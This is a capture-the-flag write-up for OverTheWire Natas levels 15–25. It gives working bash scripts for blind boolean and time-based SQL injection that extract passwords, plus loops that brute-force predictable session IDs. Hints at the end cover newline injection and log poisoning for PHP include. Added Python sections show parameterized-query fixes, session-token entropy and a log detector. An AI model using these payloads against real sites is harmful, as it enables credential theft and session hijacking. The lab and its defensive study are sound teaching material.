Natas 15
Attempt until the password substring matches
# $pw holds the natas15 password (set it before running; curl sends it as HTTP
# basic auth). The injected COLLATE latin1_general_cs makes the LIKE prefix test
# case-sensitive, and the "user exists" text in the response is the yes/no
# oracle. Each pass of the outer loop recovers one more character and the
# script stops when no candidate character extends the prefix.
k=''
for z in {0..33}; do
  found=0
  for v in {{a..z},{A..Z},{0..9}}; do
    curl -u "natas15:$pw" 'http://natas15.natas.labs.overthewire.org/index.php' \
      --data 'username=natas16%22+and+password+COLLATE+latin1_general_cs+LIKE%22'$k$v'%25' \
      --compressed > out 2>/dev/null
    if [ "$(grep -c 'user exists' out)" -gt 0 ]; then
      k=$k$v; echo "$k"; found=1; break
    fi
  done
  if [ $found -eq 0 ]; then break; fi
done
Natas 18
Recover the password by injecting a 10-second sleep that fires only when the guessed prefix is correct
# timeout.sh contains:
perl -e 'alarm shift; exec @ARGV' "$@"

Test the duration of the curl command

# $pw holds the natas17 password (the level the request is sent to), and k
# accumulates the recovered natas18 password; the original reused $pw for
# both, which clobbers the login credential. The injected
# IF(... LIKE ..., SLEEP(10), "NO") stalls the response when the prefix
# matches; timeout.sh kills curl after 2 seconds, so a non-zero exit status is
# the "match" signal. A network error also yields a non-zero status, so repeat
# a suspicious match before trusting it.
k=''
for z in {0..33}; do
  w=0
  for v in {{a..z},{A..Z},{0..9}}; do
    ./timeout.sh 2 bash -c "curl -u 'natas17:$pw' 'http://natas17.natas.labs.overthewire.org/index.php' \
      --data 'username=natas18%22+AND+IF+%28+password+COLLATE+latin1_general_cs+LIKE+%22$k$v%25%22%2C+SLEEP%2810%29%2C+%22NO%22%29+%23' \
      --compressed > out 2>/dev/null" 2>/dev/null
    if [ $? -ne 0 ]; then
      k=$k$v; echo "$k"; w=1
    fi
  done
  if [ $w -eq 0 ]; then break; fi
done
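The boolean oracle that the Natas 15 and Natas 18 scripts lean on exists only because the login query is assembled by string concatenation. The Python below is an added illustration, not part of the original writeup: it rebuilds that pattern against an in-memory SQLite table (constructed sample user and password; single-quoted SQL, since SQLite treats double quotes as identifiers; PRAGMA case_sensitive_like standing in for the COLLATE latin1_general_cs trick) and puts a parameterized lookup beside it. The same LIKE-prefix payload that answers yes or no against the vulnerable query is just an unknown username against the fixed one. SQLite has no SLEEP(), so the time-based variant is not reproduced, but the defect and the fix are identical.

```python
import sqlite3

# Constructed sample data: one account whose password a prefix probe would try
# to learn one character at a time (value made up for this example).
SAMPLE_USERS = [("natas16", "ExampleP4ss")]


def make_db():
    """In-memory SQLite stand-in for the level's users table."""
    conn = sqlite3.connect(":memory:")
    # Stand-in for COLLATE latin1_general_cs: make LIKE case-sensitive so a
    # prefix probe can tell 'E' from 'e'.
    conn.execute("PRAGMA case_sensitive_like = ON")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def user_exists_vulnerable(conn, username):
    """The level's pattern: user input spliced straight into the SQL text.
    Returns the 'user exists' boolean that an attacker reads as an oracle."""
    sql = f"SELECT 1 FROM users WHERE username='{username}'"
    return conn.execute(sql).fetchone() is not None


def user_exists_fixed(conn, username):
    """Hardened form: the username is bound as a parameter, so quotes and SQL
    keywords inside it are just characters of the literal being compared."""
    sql = "SELECT 1 FROM users WHERE username=?"
    return conn.execute(sql, (username,)).fetchone() is not None


def blind_probe(exists_fn, conn, prefix):
    """Send the writeup's prefix payload through a given lookup function.
    Against the vulnerable lookup, the original query's trailing quote closes
    the injected LIKE pattern, exactly as the %22 ... %25 payload relies on."""
    payload = f"natas16' AND password LIKE '{prefix}%"
    return exists_fn(conn, payload)


if __name__ == "__main__":
    conn = make_db()
    for fn in (user_exists_vulnerable, user_exists_fixed):
        print(fn.__name__,
              "prefix 'E':", blind_probe(fn, conn, "E"),
              "prefix 'e':", blind_probe(fn, conn, "e"))
```

Run as a script, the vulnerable lookup answers True for the prefix 'E' and False for 'e', which is the leak the loops above harvest; the parameterized lookup answers False for both, because no account is literally named `natas16' AND password LIKE 'E%`.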
Natas 19
Search for session ID with a different page output
# $pw holds the natas18 password (the level the request is sent to). The loop
# walks the 641 candidate session IDs; the admin session is the one whose page
# no longer contains the "regular" user text.
for k in {0..640}; do
  curl -u "natas18:$pw" 'http://natas18.natas.labs.overthewire.org/index.php' \
    -H "Cookie: PHPSESSID=$k" --compressed > out 2>/dev/null
  if [ "$(grep -c regular out)" -eq 0 ]; then
    echo "$k"; break
  fi
done
Natas 20
Brute force the session ID after capturing ~500 fresh sessions (with username=admin) to find the common cookie elements: the ID starts with 3 and ends with 2d61646d696e.

# $pw holds the natas19 password (the level the request is sent to). The fixed
# suffix 2d61646d696e is the hex encoding of "-admin", and the leading 3 is the
# high nibble of an ASCII digit, so the cookie is hex("<number>-admin"); the
# loop fills in the digits between the two known parts.
for k in {0..64000}; do
  curl -u "natas19:$pw" 'http://natas19.natas.labs.overthewire.org/index.php?debug=1' \
    -H "Cookie: PHPSESSID=3${k}2d61646d696e" --compressed > out 2>/dev/null
  if [ "$(grep -Ec 'regular|username' out)" -eq 0 ]; then
    echo "found: $k"; break
  fi
  if [ $((k % 100)) -eq 0 ]; then echo "$k"; fi
done
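The two session-ID loops above work because the ID space is tiny and structured: 641 integers on the first level, and on the second the hex encoding of "<number>-admin" (the observed suffix 2d61646d696e decodes to "-admin", and the leading 3 is the high nibble of an ASCII digit). The Python below is an added example, not part of the writeup: it decodes and re-encodes that cookie format, puts its keyspace next to a token from the secrets module, and runs a simple detector over constructed log lines (a made-up format that records the PHPSESSID cookie per request, not Apache's default) to flag a client cycling through many session IDs, which is what the loops above look like from the server side.

```python
import math
import re
import secrets
from collections import defaultdict

# Fixed tail observed in the writeup: hex of "-admin".
ADMIN_SUFFIX_HEX = "2d61646d696e"


def decode_session_id(sid_hex):
    """Decode a natas19-style cookie back to its '<number>-admin' form."""
    return bytes.fromhex(sid_hex).decode("ascii")


def encode_session_id(n, user="admin"):
    """Build the predictable cookie: hex('<n>-<user>')."""
    return f"{n}-{user}".encode("ascii").hex()


def guessable_bits(keyspace):
    """Bits of entropy an attacker has to guess for a keyspace of that size."""
    return math.log2(keyspace)


def secure_session_id():
    """What the cookie should be: 128 bits from a CSPRNG, hex-encoded."""
    return secrets.token_hex(16)


# Constructed log format for this example: client IP first, the PHPSESSID
# cookie value at the end of the line.
LOG_RE = re.compile(r"^(?P<ip>\S+) .*PHPSESSID=(?P<sid>[0-9a-fA-F]+)")


def flag_session_guessing(log_lines, threshold=20):
    """Return client IPs that presented more than `threshold` distinct session
    IDs: a normal client shows one or a few, a guessing loop shows hundreds."""
    sids_by_ip = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            sids_by_ip[m["ip"]].add(m["sid"].lower())
    return sorted(ip for ip, sids in sids_by_ip.items() if len(sids) > threshold)


def sample_log():
    """Constructed sample: one client walking the cookie space, one normal
    client reusing a single random session ID."""
    lines = [f"203.0.113.9 GET /index.php 200 PHPSESSID={encode_session_id(i)}"
             for i in range(50)]
    lines += ["198.51.100.4 GET /index.php 200 PHPSESSID=" + secure_session_id()] * 5
    return lines


if __name__ == "__main__":
    print(decode_session_id("3132332d61646d696e"))
    print(f"{guessable_bits(641):.1f} bits vs {guessable_bits(2 ** 128):.0f} bits")
    print(flag_session_guessing(sample_log()))
```

The 641-value space is about 9.3 bits, which is why a single loop exhausts it in minutes; a 16-byte token from secrets.token_hex is 128 bits, so the same loop would not finish. The threshold in the detector is a starting point only: a NAT gateway legitimately fronts many sessions, so baseline distinct-session counts per client in your own environment before alerting on them.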
Other Hints
21 – Add %0A to trick the sessionwrite
22 – Simply change the form to send admin=1, then use the sessionID in the other site
23 – Ignore the redirect (and get the full webpage via curl)
24 – Break strcmp (make it fail)
25 – Log our PHP code into the *.log, then have the index.php 'include' the PHP commands we embedded in the log file.